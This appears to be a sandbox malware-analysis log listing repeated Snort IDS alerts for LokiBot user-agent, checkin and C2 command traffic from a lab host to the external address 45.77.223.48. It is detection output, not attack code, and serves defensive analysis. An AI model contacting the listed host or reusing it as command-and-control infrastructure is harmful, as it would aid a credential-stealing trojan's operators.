                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49753 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49753 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49753 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49753 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49755 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49755 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49760 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49760 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49760 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49760 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49761 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49762 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49763 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49763 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49779 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49780 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49796 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49796 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49799 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49799 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49801 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49801 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49801 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49801 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49802 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49802 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49802 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49802 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49803 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49803 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49803 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49803 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49805 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49805 -> 45.77.223.48:80
